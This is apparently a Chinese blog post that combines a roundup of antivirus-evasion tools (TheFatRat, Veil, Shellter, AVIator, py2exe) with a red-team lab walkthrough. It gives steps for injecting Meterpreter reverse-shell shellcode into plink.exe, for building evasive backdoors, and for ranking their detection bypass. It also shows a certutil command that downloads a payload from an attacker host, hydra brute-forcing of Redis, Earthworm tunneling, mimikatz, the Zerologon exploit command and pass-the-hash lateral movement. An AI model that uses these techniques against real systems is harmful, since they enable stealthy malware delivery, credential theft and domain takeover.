Windows免杀小结（工具篇）

TheFatRat： https://github.com/Screetsec/TheFatRat

安装过程介绍得很详细，这里稍微注意一下：

进入主程序后，先键入：6

选择生成bat文件：

之后用msf进行监听，在目标机器上执行.bat文件，免杀效果还行

Veil： https://github.com/Veil-Framework/Veil

安装过程参考： Veil3.1免杀安装

简单使用过程：

上传绕过效果还行：

当然病毒查杀很容易查出来，可以作为上传绕过手段

Shellter：

利用过程参考： Kali Shellter 5.1：动态ShellCode注入工具 绕过安全软件

这里使用apt-get安装：

安装以后，从终端启动：

键入“A”启用自动模式

PE目标为plink.exe，这里我们复制一个到root目录下

在提示PE目标时，输入：root/plink.exe

当询问是否启用隐身模式时输入：“Y”

在隐身模式新功能下，后门文件仍然具有原始文件的功能

当提示输入Payloads时选择“L”然后选择“1” Meterpreter_Reverse_TCP

之后输出攻击方ip，监听端口等等

Shellter将会在plink.exe中注入shellcode

这时我们发现跟原文件相比，root目录下的plink.exe文件变大了些，说明注入完成

之后启动msf：

我们把plink.exe上传到目标机

当我们用plink进行远程登录的时候，在kali中Metasploit也得到了一个session

老实说，我个人感觉msf得到的session不太稳定，建议提前使用：

注入到一个稳定的进程

AVIator是后门生成器实用程序，使用加密和注入技术来绕过AV检测。

需要.Net 4.6.1环境才能成功编译生成程序

项目地址： https://github.com/Ch0pin/AVIator

将msfvenom生成的shellcode输入到该工具的payload里。AES KEY和IV默认就可以

点击Encrypt，生成加密后的payload：

目标 *** 作系统根据实际情况选择，这里选择x86通用一些。

这里选择注入类型，在内存中创建新类型。

另外也可以自定义图标。

点击generate exe后就可以生成exe后门程序了。

运行后可成功上线。

网上有很多靠python第三方工具来达到免杀效果的文章，也有python加载shellcode之类的文章。有pyinstaller、py2exe。这里说一种打包的方式Py2exe

在windows7虚拟机上安装python3.4和py2exe(只支持python3.4，使用pip即可）

利用msfvenom生成py脚本：

创建setup.py

这里我们打包生成exe

使用msf进行监听：

我测试的时候是使用下面的命令进行监听

运行生成的demo.exe，成功反d：

免杀是真的牛批！

综上，经过本地测试和virustotal检测：

免杀效果：py2exe >TheFatRat >Shellter >Veil = AVIator

Veil生成的恶意程序上传到带有腾讯电脑管家的主机中不会被杀死，能正常上传，但能被查杀发现。

AVIator生成的恶意程序既能上传又能绕过查杀检测，但一运行就GG

py2exe贼稳

windows免杀工具三部曲（一）

windows免杀工具三部曲（二）

前言

在红队攻防中，我们主要在外网进行信息收集，通过cms或者其他漏洞拿到shell，之后通过免杀木马将windows或linux服务器上线到cobalt strike或msf等c2服务器，之后对内网进行信息收集并绘制网络拓扑图，进行工作组或域渗透，拿到各个网段机器的权限，远程登陆并截图证明。

环境配置

从虚拟机网络来看

机器描述

目录如下

蚁剑拿shell

msf免杀拿shell

使用msfvenom生成免杀木马payload，里面的IP和端口自行修改，就是反dshell的kali

使用分离免杀工具生成loader.exe文件

对生成的exe文件进行加壳免杀

免杀效果如下

免杀之后通过蚁剑上传到server-bt上

msf开启监听

蚁剑运行

getuid

ps

msf内网渗透

load mimikatz # 加载Mimikatz模块

成功开启了远程桌面，并且生成了一个txt文件，这个txt文件往后可用来关闭远程桌面，关闭命令

run multi_console_command -r /root/.msf4/loot/xx_default_192.168.1.5_host.windows.cle_xxx5.txt

绕过火绒添加用户

蚂蚁剑或者cs上传添加用户.exe

远程登录server-bt

然后再添加一个由system权限下开启的桌面进程

Earthworm穿透

上传EW（Earthworm）到C:/wwwroot/

kali环境进行爆破

proxychains hydra -P /usr/xxx/password.lst 192.168.59.4 redis 6379

利用过程

代理蚁剑进行连接这个shell

并查看权限

Earthworm穿透

挂代理，通过之前上传的EW（Earthworm）

服务器端执行以下命令(关掉server-bt的防火墙代理才能生效)

execute C:\wwwroot\ew.exe -s ssocksd -l 1090

用msfvenom生成一个正向马传进去（因为无法访问外网，反向出不来），msf正向连接。

使用分离免杀工具生成loader.exe文件

免杀效果如下

C:\ProgramData\xxxx.exe -i -c "certutil -urlcache -split -f http://192.168.59.133/msf1.exe msf1.exe

成功获取服务器的shell，之后就是各种权限维持了。创建计划任务、开机自启等等都能够实现。

ps

添加账户和远程连接同第一层

load mimikatz # 加载Mimikatz模块

这里已经满足触发zerologon的两个条件，能ping通域控制器，知道域控计算机名，当然最后dump出域内所有hash的时候需要域名

置空域控机器用户NTLM hash

proxychains python3 cve-2020-1472-exploit.py 12server-dc$ 10.10.10.201

接下来用置空的机器账户dump所有hash

(890c这个hash就是"空"的NTML hash）

我们的目标是获得域内administrator的hash，然后就可以hash传递，登陆任意域内机器

利用 psexec(PTH)上线server-dc到 MSF：

成功获取到shell

利用 psexec 上线server-ex13到 MSF：

---